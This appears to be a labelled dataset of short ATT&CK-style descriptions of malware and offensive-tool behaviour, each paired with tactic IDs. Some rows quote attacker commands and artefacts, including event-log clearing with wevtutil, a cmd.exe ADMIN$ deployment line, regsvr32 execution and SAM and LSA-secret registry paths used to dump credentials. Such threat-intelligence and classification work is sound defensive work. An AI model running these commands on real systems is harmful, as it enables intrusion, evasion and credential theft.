Helminth can use DNS for C2.,['TA0011:Command and Control']
Helminth splits data into chunks up to 23 bytes and sends the data in DNS queries to its C2 server.,['TA0010:Exfiltration']
Helminth has checked for the domain admin group and Exchange Trusted Subsystem groups using the commands net group Exchange Trusted Subsystem /domain and net group domain admins /domain.,['TA0007:Discovery']
The Helminth config file is encrypted with RC4.,['TA0005:Defense Evasion']
Helminth can download additional files.,['TA0011:Command and Control']
The executable version of Helminth has a module to log keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
Helminth creates folders to store output from batch scripts prior to sending the information to its C2 server.,['TA0009:Collection']
Helminth has checked the local administrators group.,['TA0007:Discovery']
One version of Helminth uses a PowerShell script.,['TA0002:Execution']
Helminth has used Tasklist to get information on processes.,['TA0007:Discovery']
Helminth establishes persistence by creating a shortcut in the Start Menu folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Helminth has used a scheduled task for persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Helminth establishes persistence by creating a shortcut.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"For C2 over HTTP, Helminth encodes data with base64 and sends it via the ""Cookie"" field of HTTP requests. For C2 over DNS, Helminth converts ASCII characters into their hexadecimal values and sends the data in cleartext.",['TA0011:Command and Control']
Helminth encrypts data sent to its C2 server over HTTP with RC4.,['TA0011:Command and Control']
One version of Helminth consists of VBScript scripts.,['TA0002:Execution']
Helminth can use HTTP for C2.,['TA0011:Command and Control']
Helminth can provide a remote shell. One version of Helminth uses batch scripting.,['TA0002:Execution']
"HermeticWiper can use `AdjustTokenPrivileges` to grant itself privileges for debugging with `SeDebugPrivilege`, creating backups with `SeBackupPrivilege`, loading drivers with `SeLoadDriverPrivilege`, and shutting down a local system with `SeShutdownPrivilege`.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
HermeticWiper can overwrite the `C:\Windows\System32\winevt\Logs` file on a targeted system.,['TA0005:Defense Evasion']
The HermeticWiper executable has been signed with a legitimate certificate issued to Hermetica Digital Ltd.,['TA0005:Defense Evasion']
"HermeticWiper can recursively wipe folders and files in `Windows`, `Program Files`, `Program Files`, `PerfLogs`, `Boot, System`, `Volume Information`, and `AppData` folders using `FSCTL_MOVE_FILE`. HermeticWiper can also overwrite symbolic links and big files in `My Documents` and on the Desktop with random bytes.",['TA0040:Impact']
HermeticWiper can decompress and copy driver files using `LZCopy`.,['TA0005:Defense Evasion']
HermeticWiper has the ability to corrupt disk partitions and obtain raw disk access to destroy data.,['TA0040:Impact']
"HermeticWiper has the ability to corrupt disk partitions, damage the Master Boot Record , and overwrite the Master File Table of all available physical drives.",['TA0040:Impact']
HermeticWiper can compress 32-bit and 64-bit driver files with the Lempel-Ziv algorithm.,['TA0005:Defense Evasion']
HermeticWiper has the ability to overwrite its own file with random bites.,['TA0005:Defense Evasion']
"HermeticWiper can enumerate common folders such as My Documents, Desktop, and AppData.",['TA0007:Discovery']
HermeticWiper has the ability to deploy through an infected system's default domain policy.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
HermeticWiper has the ability to set the `HKLM:\SYSTEM\\CurrentControlSet\\Control\\CrashControl\CrashDumpEnabled` Registry key to `0` in order to disable crash dumps.,['TA0005:Defense Evasion']
HermeticWiper can disable pop-up information about folders and desktop items and delete Registry keys to hide malicious services.,['TA0005:Defense Evasion']
HermeticWiper can disable the VSS service on a compromised host using the service control manager.,['TA0040:Impact']
HermeticWiper has used the name `postgressql.exe` to mask a malicious payload.,['TA0005:Defense Evasion']
"HermeticWiper has the ability to modify Registry keys to disable crash dumps, colors for compressed files, and pop-up information about folders and desktop items.",['TA0005:Defense Evasion']
"HermeticWiper can call multiple Windows API functions used for privilege escalation, service execution, and to overwrite random bites of data.",['TA0002:Execution']
HermeticWiper has the ability to use scheduled tasks for execution.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
HermeticWiper can create system services to aid in executing the payload.,['TA0002:Execution']
HermeticWiper has the ability to stop the Volume Shadow Copy service.,['TA0040:Impact']
"HermeticWiper can determine the OS version, bitness, and enumerate physical drives on a targeted host.",['TA0007:Discovery']
HermeticWiper can initiate a system shutdown.,['TA0040:Impact']
HermeticWiper has the ability to receive a command parameter to sleep prior to carrying out destructive actions on a targeted host.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
HermeticWiper can use `cmd.exe /Q/c move CSIDL_SYSTEM_DRIVE\temp\sys.tmp1 CSIDL_WINDOWS\policydefinitions\postgresql.exe 1> \\127.0.0.1\ADMIN$\_1636727589.6007507 2>&1` to deploy on an infected system.,['TA0002:Execution']
HermeticWiper can load drivers by creating a new service using the `CreateServiceW` API.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
HermeticWizard has the ability to use `wevtutil cl system` to clear event logs.,['TA0005:Defense Evasion']
HermeticWizard has been signed by valid certificates assigned to Hermetica Digital.,['TA0005:Defense Evasion']
HermeticWizard can execute files on remote machines using DCOM.,['TA0002:Execution']
HermeticWizard has the ability to encrypt PE files with a reverse XOR loop.,['TA0005:Defense Evasion']
HermeticWizard can copy files to other machines on a compromised network.,['TA0008:Lateral Movement']
HermeticWizard has been named `exec_32.dll` to mimic a legitimate MS Outlook .dll.,['TA0005:Defense Evasion']
HermeticWizard can connect to remote shares using `WNetAddConnection2W`.,['TA0002:Execution']
HermeticWizard has the ability to scan ports on a compromised network.,['TA0007:Discovery']
HermeticWizard can use a list of hardcoded credentials in attempt to authenticate to SMB shares.,['TA0006:Credential Access']
HermeticWizard has used `regsvr32.exe /s /i` to execute malicious payloads.,['TA0005:Defense Evasion']
"HermeticWizard can find machines on the local network by gathering known local IP addresses through `DNSGetCacheDataTable`, `GetIpNetTable`,`WNetOpenEnumW`,`NetServerEnum`,`GetTcpTable`, and `GetAdaptersAddresses.`",['TA0007:Discovery']
HermeticWizard has the ability to create a new process using `rundll32`.,['TA0005:Defense Evasion']
HermeticWizard can use a list of hardcoded credentials to to authenticate via NTLMSSP to the SMB shares on remote systems.,['TA0008:Lateral Movement']
HermeticWizard can use `OpenRemoteServiceManager` to create a service.,['TA0002:Execution']
HermeticWizard can use `cmd.exe` for execution on compromised hosts.,['TA0002:Execution']
HermeticWizard can use WMI to create a new process on a remote machine via `C:\windows\system32\cmd.exe /c start C:\windows\system32\\regsvr32.exe /s /iC:\windows\.dll`.,['TA0002:Execution']
Heyoka Backdoor can use DNS tunneling for C2 communications.,['TA0011:Command and Control']
Heyoka Backdoor can decrypt its payload prior to execution.,['TA0005:Defense Evasion']
Heyoka Backdoor can inject a DLL into rundll32.exe for execution.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Heyoka Backdoor can encrypt its payload.,['TA0005:Defense Evasion']
Heyoka Backdoor has the ability to delete folders and files from a targeted system.,['TA0005:Defense Evasion']
Heyoka Backdoor has the ability to search the compromised host for files.,['TA0007:Discovery']
Heyoka Backdoor has been spread through malicious document lures.,['TA0002:Execution']
Heyoka Backdoor has been named `srvdll.dll` to appear as a legitimate service.,['TA0005:Defense Evasion']
Heyoka Backdoor can identify removable media attached to victim's machines.,['TA0007:Discovery']
Heyoka Backdoor can gather process information.,['TA0007:Discovery']
Heyoka Backdoor can use spoofed DNS requests to create a bidirectional tunnel between a compromised host and its C2 servers.,['TA0011:Command and Control']
Heyoka Backdoor can establish persistence with the auto start function including using the value `EverNoteTrayUService`.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Heyoka Backdoor can use rundll32.exe to gain execution.,['TA0005:Defense Evasion']
Heyoka Backdoor can enumerate drives on a compromised host.,['TA0007:Discovery']
Heyoka Backdoor can check if it is running as a service on a compromised host.,['TA0007:Discovery']
Hi-Zor encrypts C2 traffic with TLS.,['TA0011:Command and Control']
Hi-Zor uses various XOR techniques to obfuscate its components.,['TA0005:Defense Evasion']
Hi-Zor deletes its RAT installer file as it executes its DLL payload file.,['TA0005:Defense Evasion']
Hi-Zor has the ability to upload and download files from its C2 server.,['TA0011:Command and Control']
Hi-Zor creates a Registry Run key to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Hi-Zor executes using regsvr32.exe called from the Registry Run Keys / Startup Folder persistence mechanism.,['TA0005:Defense Evasion']
Hi-Zor encrypts C2 traffic with a double XOR using two distinct single-byte keys.,['TA0011:Command and Control']
Hi-Zor communicates with its C2 server over HTTPS.,['TA0011:Command and Control']
Hi-Zor has the ability to create a reverse shell.,['TA0002:Execution']
HiddenWasp uses a cipher to implement a decoding function.,['TA0005:Defense Evasion']
HiddenWasp adds itself as a shared object to the LD_PRELOAD environment variable.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
HiddenWasp encrypts its configuration and payload.,['TA0005:Defense Evasion']
HiddenWasp downloads a tar compressed archive from a download server to the system.,['TA0011:Command and Control']
HiddenWasp creates a user account as a means to provide initial persistence to the compromised machine.,['TA0003:Persistence']
HiddenWasp communicates with a simple network protocol over TCP.,['TA0011:Command and Control']
HiddenWasp installs reboot persistence by adding itself to /etc/rc.local.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
HiddenWasp uses a rootkit to hook and implement functions on the system.,['TA0005:Defense Evasion']
HiddenWasp uses an RC4-like algorithm with an already computed PRGA generated key-stream for network communication.,['TA0011:Command and Control']
HiddenWasp uses a script to automate tasks on the victim's machine and to assist in execution.,['TA0002:Execution']
Hikit has attempted to disable driver signing verification by tampering with several Registry keys prior to the loading of a rootkit driver component.,['TA0005:Defense Evasion']
Hikit has used DLL Search Order Hijacking to load oci.dll as a persistence mechanism.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Hikit can upload files from compromised machines.,['TA0009:Collection']
Hikit has the ability to download files to a compromised host.,['TA0011:Command and Control']
Hikit installs a self-generated certificate to the local trust store as a root CA and Trusted Publisher.,['TA0005:Defense Evasion']
Hikit supports peer connections.,['TA0011:Command and Control']
Hikit has been spread through spear phishing.,['TA0001:Initial Access']
Hikit is a Rootkit that has been used by Axiom.,['TA0005:Defense Evasion']
Hikit performs XOR encryption.,['TA0011:Command and Control']
Hikit has used HTTP for C2.,['TA0011:Command and Control']
Hikit has the ability to create a remote shell and run given commands.,['TA0002:Execution']
Hildegard has used an IRC channel for C2 communications.,['TA0011:Command and Control']
Hildegard has used history -c to clear script shell logs.,['TA0005:Defense Evasion']
Hildegard has queried the Cloud Instance Metadata API for cloud credentials.,['TA0006:Credential Access']
Hildegard has used xmrig to mine cryptocurrency.,['TA0040:Impact']
Hildegard was executed through the kubelet API run command and by executing commands on running containers.,['TA0002:Execution']
Hildegard has used masscan to search for kubelets and the kubelet API for additional running containers.,['TA0007:Discovery']
"Hildegard has searched for SSH keys, Docker credentials, and Kubernetes service tokens.",['TA0006:Credential Access']
Hildegard has decrypted ELF files with AES.,['TA0005:Defense Evasion']
Hildegard has modified DNS resolvers to evade DNS monitoring tools.,['TA0005:Defense Evasion']
Hildegard has modified /etc/ld.so.preload to intercept shared library import functions.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Hildegard has encrypted an ELF file.,['TA0005:Defense Evasion']
Hildegard has used the BOtB tool that can break out of containers.,['TA0004:Privilege Escalation']
Hildegard has used the BOtB tool which exploits CVE-2019-5736.,['TA0004:Privilege Escalation']
Hildegard was executed through an unsecure kubelet that allowed anonymous access to the victim environment.,"['TA0001:Initial Access', 'TA0003:Persistence']"
Hildegard has deleted scripts after execution.,['TA0005:Defense Evasion']
Hildegard has downloaded additional scripts that build and run Monero cryptocurrency miners.,['TA0011:Command and Control']
Hildegard has created a user named “monerodaemon”.,['TA0003:Persistence']
Hildegard has disguised itself as a known Linux process.,['TA0005:Defense Evasion']
Hildegard has used masscan to look for kubelets in the internal Kubernetes network.,['TA0007:Discovery']
Hildegard has searched for private keys in .ssh.,['TA0006:Credential Access']
Hildegard has established tmate sessions for C2 communications.,['TA0011:Command and Control']
Hildegard has modified /etc/ld.so.preload to overwrite readdir and readdir64.,['TA0005:Defense Evasion']
Hildegard has packed ELF files into other binaries.,['TA0005:Defense Evasion']
"Hildegard has collected the host's OS, CPU, and memory information.",['TA0007:Discovery']
Hildegard has started a monero service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Hildegard has used shell scripts for execution.,['TA0002:Execution']
Hildegard has downloaded scripts from GitHub.,['TA0011:Command and Control']
HotCroissant has the ability to list the names of all open windows on the infected host.,['TA0007:Discovery']
HotCroissant has encrypted strings with single-byte XOR and base64 encoded RC4.,['TA0005:Defense Evasion']
HotCroissant has the ability to download files from the infected host to the command and control server.,['TA0010:Exfiltration']
"HotCroissant has the ability to clean up installed files, delete files, and delete itself from the victim’s machine.",['TA0005:Defense Evasion']
HotCroissant has the ability to retrieve a list of files in a given directory as well as drives and drive types.,['TA0007:Discovery']
HotCroissant has the ability to hide the window for operations performed on a given file.,['TA0005:Defense Evasion']
HotCroissant has the ability to upload a file from the command and control server to the victim machine.,['TA0011:Command and Control']
HotCroissant can perform dynamic DLL importing and API lookups using LoadLibrary and GetProcAddress on obfuscated strings.,['TA0002:Execution']
HotCroissant has the ability to list running processes on the infected host.,['TA0007:Discovery']
HotCroissant has attempted to install a scheduled task named “Java Maintenance64” on startup to establish persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
HotCroissant has the ability to do real time screen viewing on an infected host.,['TA0009:Collection']
HotCroissant has the ability to stop services on the infected host.,['TA0040:Impact']
HotCroissant can retrieve a list of applications from the SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths registry key.,['TA0007:Discovery']
HotCroissant has used the open source UPX executable packer.,['TA0005:Defense Evasion']
HotCroissant has compressed network communications and encrypted them with a custom stream cipher.,['TA0011:Command and Control']
"HotCroissant has the ability to determine if the current user is an administrator, Windows product name, processor name, screen resolution, and physical RAM of the infected host.",['TA0007:Discovery']
HotCroissant has the ability to identify the IP address of the compromised machine.,['TA0007:Discovery']
HotCroissant has the ability to collect the username on the infected host.,['TA0007:Discovery']
HotCroissant has the ability to retrieve a list of services on the infected host.,['TA0007:Discovery']
HotCroissant can remotely open applications on the infected host with the ShellExecuteA command.,['TA0002:Execution']
Hydraq creates a backdoor through which remote attackers can adjust token privileges.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Hydraq creates a backdoor through which remote attackers can clear all system event logs.,['TA0005:Defense Evasion']
Hydraq creates a backdoor through which remote attackers can read data from files.,['TA0009:Collection']
Hydraq connects to a predefined domain on port 443 to exfil gathered information.,['TA0010:Exfiltration']
Hydraq creates a backdoor through which remote attackers can delete files.,['TA0005:Defense Evasion']
"Hydraq creates a backdoor through which remote attackers can check for the existence of files, including its own components, as well as retrieve a list of logical drives.",['TA0007:Discovery']
Hydraq creates a backdoor through which remote attackers can download files and additional malware components.,['TA0011:Command and Control']
"Hydraq creates a Registry subkey to register its created service, and can also uninstall itself later by deleting this value. Hydraq's backdoor also enables remote attackers to modify and delete subkeys.",['TA0005:Defense Evasion']
Hydraq uses basic obfuscation in the form of spaghetti code.,['TA0005:Defense Evasion']
Hydraq creates a backdoor through which remote attackers can monitor processes.,['TA0007:Discovery']
"Hydraq creates a backdoor through which remote attackers can retrieve system information, such as CPU speed, from Registry keys.",['TA0007:Discovery']
Hydraq includes a component based on the code of VNC that can stream a live feed of the desktop of an infected host.,['TA0009:Collection']
Hydraq uses svchost.exe to execute a malicious DLL included in a new service group.,['TA0002:Execution']
Hydraq creates a backdoor through which remote attackers can load and call DLL functions.,['TA0002:Execution']
Hydraq C2 traffic is encrypted using bitwise NOT and XOR operations.,['TA0011:Command and Control']
"Hydraq creates a backdoor through which remote attackers can retrieve information such as computer name, OS version, processor speed, memory size, and CPU speed.",['TA0007:Discovery']
Hydraq creates a backdoor through which remote attackers can retrieve IP addresses of compromised machines.,['TA0007:Discovery']
Hydraq creates a backdoor through which remote attackers can monitor services.,['TA0007:Discovery']
Hydraq creates new services to establish persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"HyperBro has used a legitimate application to sideload a DLL to decrypt, decompress, and run a payload.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
HyperBro can unpack and decrypt its payload prior to execution.,['TA0005:Defense Evasion']
HyperBro can be delivered encrypted to a compromised host.,['TA0005:Defense Evasion']
HyperBro has the ability to delete a specified file.,['TA0005:Defense Evasion']
HyperBro has the ability to download additional files.,['TA0011:Command and Control']
HyperBro has the ability to run an application or script/file via API.,['TA0002:Execution']
HyperBro can run shellcode it injects into a newly created process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
HyperBro has the ability to take screenshots.,['TA0009:Collection']
HyperBro has the ability to start and stop a specified service.,['TA0002:Execution']
HyperBro has the ability to pack its payload.,['TA0005:Defense Evasion']
HyperBro can list all services and their configurations.,['TA0007:Discovery']
HyperBro has used HTTPS for C2 communications.,['TA0011:Command and Control']
HyperStack can use default credentials to connect to IPC$ shares on remote machines.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
HyperStack can connect to the IPC$ share on remote machines.,['TA0002:Execution']
HyperStack can enumerate all account names on a remote share.,['TA0007:Discovery']
HyperStack can add the name of its communication pipe to HKLM\SYSTEM\\CurrentControlSet\\Services\\lanmanserver\\parameters\NullSessionPipes.,['TA0005:Defense Evasion']
HyperStack can use Windows API's ConnectNamedPipe and WNetAddConnection2 to detect incoming connections and connect to remote shares.,['TA0002:Execution']
HyperStack has used RSA encryption for C2 communications.,['TA0011:Command and Control']
IMAPLoader is executed via the AppDomainManager injection technique.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
IMAPLoader modifies Windows tasks on the victim machine to reference a retrieved PE file through a path modification.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
IMAPLoader hides the Windows Console window created by its execution by directly importing the `kernel32.dll` and `user32.dll` libraries `GetConsoleWindow` and `ShowWindow` APIs.,['TA0005:Defense Evasion']
IMAPLoader is a loader used to retrieve follow-on payload encoded in email messages for execution on victim systems.,['TA0011:Command and Control']
IMAPLoader uses the IMAP email protocol for command and control purposes.,['TA0011:Command and Control']
IMAPLoader imports native Windows APIs such as `GetConsoleWindow` and `ShowWindow`.,['TA0002:Execution']
IMAPLoader creates scheduled tasks for persistence based on the operating system version of the victim machine.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
IMAPLoader uses WMI queries to gather information about the victim machine.,['TA0007:Discovery']
IMAPLoader uses WMI queries to query system information on victim hosts.,['TA0002:Execution']
"INC Ransomware can encrypt data on victim systems, including through the use of partial encryption and multi-threading to speed encryption.",['TA0040:Impact']
INC Ransomware can run `CryptStringToBinaryA` to decrypt base64 content containing its ransom note.,['TA0005:Defense Evasion']
INC Ransomware can verify the presence of specific drivers on compromised hosts including Microsoft Print to PDF and Microsoft XPS Document Writer.,['TA0007:Discovery']
INC Ransomware can receive command line arguments to encrypt specific files and directories.,['TA0007:Discovery']
INC Ransomware can delete volume shadow copy backups from victim machines.,['TA0040:Impact']
INC Ransomware has the ability to change the background wallpaper image to display the ransom note.,['TA0040:Impact']
INC Ransomware can push its encryption executable to multiple endpoints within compromised infrastructure.,['TA0008:Lateral Movement']
INC Ransomware can use the API `DeviceIoControl` to resize the allocated space for and cause the deletion of volume shadow copy snapshots.,['TA0002:Execution']
INC Ransomware has the ability to check for shared network drives to encrypt.,['TA0007:Discovery']
INC Ransomware can identify external USB and hard drives for encryption and printers to print ransom notes.,['TA0007:Discovery']
INC Ransomware campaigns have used spearphishing emails for initial access.,['TA0001:Initial Access']
INC Ransomware can use the Microsoft Win32 Restart Manager to kill processes with a specific handle or that are accessing resources it wants to encrypt.,['TA0007:Discovery']
INC Ransomware can issue a command to kill a process on compromised hosts.,['TA0040:Impact']
INC Ransomware can discover and mount hidden drives to encrypt them.,['TA0007:Discovery']
INC Ransomware has the ability to use wmic.exe to spread to multiple endpoints within a compromised environment.,['TA0002:Execution']
IPsec Helper can delete various service traces related to persistent execution when commanded.,['TA0005:Defense Evasion']
IPsec Helper can identify specific files and folders for follow-on exfiltration.,['TA0009:Collection']
IPsec Helper contains an embedded XML configuration file with an encrypted list of command and control servers. These are written to an external configuration file during execution.,['TA0005:Defense Evasion']
IPsec Helper exfiltrates specific files through its command and control framework.,['TA0010:Exfiltration']
IPsec Helper can delete itself when given the appropriate command.,['TA0005:Defense Evasion']
IPsec Helper can delete various registry keys related to its execution and use.,['TA0005:Defense Evasion']
IPsec Helper can download additional payloads from command and control nodes and execute them.,['TA0008:Lateral Movement']
IPsec Helper can make arbitrary changes to registry keys based on provided input.,['TA0005:Defense Evasion']
IPsec Helper can run arbitrary PowerShell commands passed to it.,['TA0002:Execution']
"IPsec Helper can identify the process it is currently running under and its number, and pass this back to a command and control node.",['TA0007:Discovery']
IPsec Helper is run as a Windows service in victim environments.,['TA0002:Execution']
"IPsec Helper will sleep for a random number of seconds, iterating 200 times over sleeps between one to three seconds, before continuing execution flow.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
IPsec Helper can run arbitrary Visual Basic scripts and commands passed to it.,['TA0002:Execution']
IPsec Helper connects to command and control servers via HTTP POST requests based on parameters hard-coded into the malware.,['TA0011:Command and Control']
IPsec Helper can run arbitrary commands passed to it through cmd.exe.,['TA0002:Execution']
ISMInjector uses the certutil command to decode a payload file.,['TA0005:Defense Evasion']
ISMInjector is obfuscated with the off-the-shelf SmartAssembly .NET obfuscator created by red-gate.com.,['TA0005:Defense Evasion']
ISMInjector hollows out a newly created process RegASM.exe and injects its payload into the hollowed process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
ISMInjector creates scheduled tasks to establish persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
IceApple can encrypt and compress files using Gzip prior to exfiltration.,['TA0009:Collection']
"IceApple can use Base64 and ""junk"" JavaScript code to obfuscate information.",['TA0005:Defense Evasion']
IceApple can harvest credentials from local and remote host registries.,['TA0006:Credential Access']
"IceApple can collect files, passwords, and other data from a compromised host.",['TA0009:Collection']
IceApple can use a Base64-encoded AES key to decrypt tasking.,['TA0005:Defense Evasion']
The IceApple Active Directory Querier module can perform authenticated requests against an Active Directory server.,['TA0007:Discovery']
IceApple's Multi File Exfiltrator module can exfiltrate multiple files from a compromised host as an HTTP response over C2.,['TA0010:Exfiltration']
IceApple can delete files and directories from targeted systems.,['TA0005:Defense Evasion']
"The IceApple Directory Lister module can list information about files and directories including creation time, last write time, name, and size.",['TA0007:Discovery']
"IceApple is an IIS post-exploitation framework, consisting of 18 modules that provide several functionalities.",['TA0003:Persistence']
"IceApple's Credential Dumper module can dump LSA secrets from registry keys, including: `HKLM\SECURITY\Policy\PolEKList\default`, `HKLM\SECURITY\Policy\Secrets\*\CurrVal`, and `HKLM\SECURITY\Policy\Secrets\*\OldVal`.",['TA0006:Credential Access']
IceApple .NET assemblies have used `App_Web_` in their file names to appear legitimate.,['TA0005:Defense Evasion']
IceApple can use reflective code loading to load .NET assemblies into `MSExchangeOWAAppPool` on targeted Exchange servers.,['TA0005:Defense Evasion']
"IceApple's Credential Dumper module can dump encrypted password hashes from SAM registry keys, including `HKLM\SAM\SAM\Domains\Account\F` and `HKLM\SAM\SAM\Domains\Account\Users\*\V`.",['TA0006:Credential Access']
The IceApple Result Retriever module can AES encrypt C2 responses.,['TA0011:Command and Control']
The IceApple Server Variable Dumper module iterates over all server variables present for the current request and returns them to the adversary.,['TA0007:Discovery']
"The IceApple ifconfig module can iterate over all network interfaces on the host and retrieve the name, description, MAC address, DNS suffix, DNS servers, gateways, IPv4 addresses, and subnet masks.",['TA0007:Discovery']
The IceApple OWA credential logger can monitor for OWA authentication requests and log the credentials.,"['TA0009:Collection', 'TA0006:Credential Access']"
IceApple can use HTTP GET to request and pull information from C2.,['TA0011:Command and Control']
IcedID has used SSL and TLS in communications with C2.,['TA0011:Command and Control']
IcedID has used ZwQueueApcThread to inject itself into remote processes.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
IcedID has used web injection attacks to redirect victims to spoofed sites designed to harvest banking and other credentials. IcedID can use a self signed TLS certificate in connection with the spoofed site and simultaneously maintains a live connection with the legitimate site to display the correct URL and certificates in the browser.,['TA0009:Collection']
IcedID can query LDAP and can use built-in `net` commands to identify additional users on the network to infect.,['TA0007:Discovery']
IcedID used Nltest during initial discovery.,['TA0007:Discovery']
IcedID has cloned legitimate websites/applications to distribute the malware.,['TA0001:Initial Access']
IcedID has embedded malicious functionality in a legitimate DLL file.,['TA0005:Defense Evasion']
IcedID has utilzed encrypted binaries and base64 encoded strings.,['TA0005:Defense Evasion']
IcedID has exfiltrated collected data via HTTPS.,['TA0010:Exfiltration']
IcedID has the ability to download additional modules and a configuration file from C2.,['TA0011:Command and Control']
IcedID has been executed through Word and Excel files with malicious embedded macros and through ISO and LNK files that execute the malicious DLL.,['TA0002:Execution']
IcedID has modified legitimate .dll files to include malicious code.,['TA0005:Defense Evasion']
IcedID can inject itself into a suspended msiexec.exe process to send beacons to C2 while appearing as a normal msi application. IcedID has also used msiexec.exe to deploy the IcedID loader.,['TA0005:Defense Evasion']
"IcedID has called ZwWriteVirtualMemory, ZwProtectVirtualMemory, ZwQueueApcThread, and NtResumeThread to inject itself into a remote process.",['TA0002:Execution']
IcedID has used the `net view /all` command to show available shares.,['TA0007:Discovery']
IcedID has the ability to identify Workgroup membership.,['TA0007:Discovery']
IcedID can inject a Cobalt Strike beacon into cmd.exe via process hallowing.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
IcedID has established persistence by creating a Registry run key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
IcedID has used rundll32.exe to execute the IcedID loader.,['TA0005:Defense Evasion']
IcedID has created a scheduled task to establish persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
IcedID can identify AV products on an infected host using the following command: ` WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List`.,['TA0007:Discovery']
IcedID has packed and encrypted its loader module.,['TA0005:Defense Evasion']
IcedID has been delivered via phishing e-mails with malicious attachments.,['TA0001:Initial Access']
IcedID has embedded binaries within RC4 encrypted .png files.,['TA0005:Defense Evasion']
IcedID has the ability to identify the computer name and OS version on a compromised host.,['TA0007:Discovery']
IcedID used the following command to check the country/language of the active console: ` cmd.exe /c chcp >&2`.,['TA0007:Discovery']
IcedID used the `ipconfig /all` command and a batch script to gather network information.,['TA0007:Discovery']
IcedID has manipulated Keitaro Traffic Direction System to filter researcher and sandbox traffic.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
IcedID has used obfuscated VBA string expressions.,['TA0002:Execution']
IcedID has used HTTPS in communications with C2.,['TA0011:Command and Control']
IcedID has used WMI to execute binaries.,['TA0002:Execution']
Imminent Monitor has a remote microphone monitoring capability.,['TA0009:Collection']
Imminent Monitor has a CommandPromptPacket and ScriptPacket module for creating a remote shell and executing scripts.,['TA0002:Execution']
Imminent Monitor has the capability to run a cryptocurrency miner on the victim machine.,['TA0040:Impact']
Imminent Monitor has a PasswordRecoveryPacket module for recovering browser passwords.,['TA0006:Credential Access']
Imminent Monitor has decoded malware components that are then dropped to the system.,['TA0005:Defense Evasion']
Imminent Monitor has a feature to disable Windows Task Manager.,['TA0005:Defense Evasion']
"Imminent Monitor has uploaded a file containing debugger logs, network information and system information to the C2.",['TA0010:Exfiltration']
Imminent Monitor has deleted files related to its dynamic debugger feature.,['TA0005:Defense Evasion']
"Imminent Monitor has a dynamic debugging feature to check whether it is located in the %TEMP% directory, otherwise it copies itself there.",['TA0007:Discovery']
Imminent Monitor has a dynamic debugging feature to set the file attribute to hidden.,['TA0005:Defense Evasion']
Imminent Monitor has a keylogging module.,"['TA0009:Collection', 'TA0006:Credential Access']"
Imminent Monitor has leveraged CreateProcessW call to execute the debugger.,['TA0002:Execution']
Imminent Monitor has encrypted the spearphish attachments to avoid detection from email gateways; the debugger also encrypts information before sending to the C2.,['TA0005:Defense Evasion']
"Imminent Monitor has a ""Process Watcher"" feature to monitor processes in case the client ever crashes or gets closed.",['TA0007:Discovery']
Imminent Monitor has a module for performing remote desktop access.,['TA0008:Lateral Movement']
Imminent Monitor has a remote webcam monitoring capability.,['TA0009:Collection']
"Impacket tools – such as getST.py or ticketer.py – can be used to steal or forge Kerberos tickets using ccache files given a password, hash, aesKey, or TGT.",['TA0006:Credential Access']
Impacket modules like GetUserSPNs can be used to get Service Principal Names for user accounts. The output is formatted to be compatible with cracking tools like John the Ripper and Hashcat.,['TA0006:Credential Access']
Impacket modules like ntlmrelayx and smbrelayx can be used in conjunction with Network Sniffing and LLMNR/NBT-NS Poisoning and SMB Relay to gather NetNTLM credentials for Brute Force or relay attacks that can gain code execution.,"['TA0009:Collection', 'TA0006:Credential Access']"
SecretsDump and Mimikatz modules within Impacket can perform credential dumping to obtain account and password information.,['TA0006:Credential Access']
SecretsDump and Mimikatz modules within Impacket can perform credential dumping to obtain account and password information.,['TA0006:Credential Access']
SecretsDump and Mimikatz modules within Impacket can perform credential dumping to obtain account and password information from NTDS.dit.,['TA0006:Credential Access']
Impacket can be used to sniff network traffic via an interface or raw socket.,"['TA0006:Credential Access', 'TA0007:Discovery']"
SecretsDump and Mimikatz modules within Impacket can perform credential dumping to obtain account and password information.,['TA0006:Credential Access']
Impacket contains various modules emulating other service execution tools such as PsExec.,['TA0002:Execution']
Impacket's wmiexec module can be used to execute commands through WMI.,['TA0002:Execution']
